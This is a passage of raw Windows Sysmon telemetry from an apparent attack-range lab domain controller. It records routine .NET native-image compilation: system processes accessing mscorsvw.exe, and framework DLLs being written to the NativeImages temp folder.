13:50:23.509{59A5CD1D-921E-6005-F903-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c98-0\PresentationUI.dll2021-01-18 13:50:23.509 10341000x80000000000000008235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:25.978{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9221-6005-FE03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:25.962{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9221-6005-FE03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:25.962{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9221-6005-FE03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:25.915{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9221-6005-FD03-00000000A301}872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:25.899{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9221-6005-FD03-00000000A301}872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:25.899{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9221-6005-FD03-00000000A301}872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:25.868{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9221-6005-FC03-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:25.853{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9221-6005-FC03-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:25.853{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9221-6005-FC03-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:25.712{59A5CD1D-921F-6005-FB03-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12bc-0\ReachFramework.dll2021-01-18 13:50:25.712 10341000x80000000000000008248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.728{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9222-6005-0204-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.712{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9222-6005-0204-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.712{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9222-6005-0204-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.556{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9222-6005-0104-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.540{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9222-6005-0104-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.540{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9222-6005-0104-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.431{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9222-6005-0004-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.431{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9222-6005-0004-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.431{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9222-6005-0004-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9222-6005-FF03-00000000A301}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.134{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9222-6005-FF03-00000000A301}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.134{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9222-6005-FF03-00000000A301}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:26.071{59A5CD1D-9221-6005-FE03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1334-0\SMDiagnostics.dll2021-01-18 13:50:26.071 10341000x80000000000000008255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:29.962{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9225-6005-0404-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:29.946{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9225-6005-0404-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 